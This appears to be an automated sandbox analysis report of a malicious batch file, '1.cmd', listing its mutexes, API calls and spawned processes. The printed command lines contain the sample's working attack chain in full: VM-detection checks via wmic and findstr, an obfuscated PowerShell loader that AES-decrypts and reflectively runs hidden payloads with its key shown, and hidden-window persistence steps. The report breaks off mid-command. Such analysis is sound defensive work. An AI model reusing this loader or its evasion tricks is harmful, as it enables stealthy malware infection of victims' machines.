Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr	Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}

Source: classification engine

Classification label: mal100.spyw.evad.winCMD@55/94@1/1

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

38_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

35_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

35_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20241004

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\2820930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\4817770
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\6260321

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1.cmd

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if 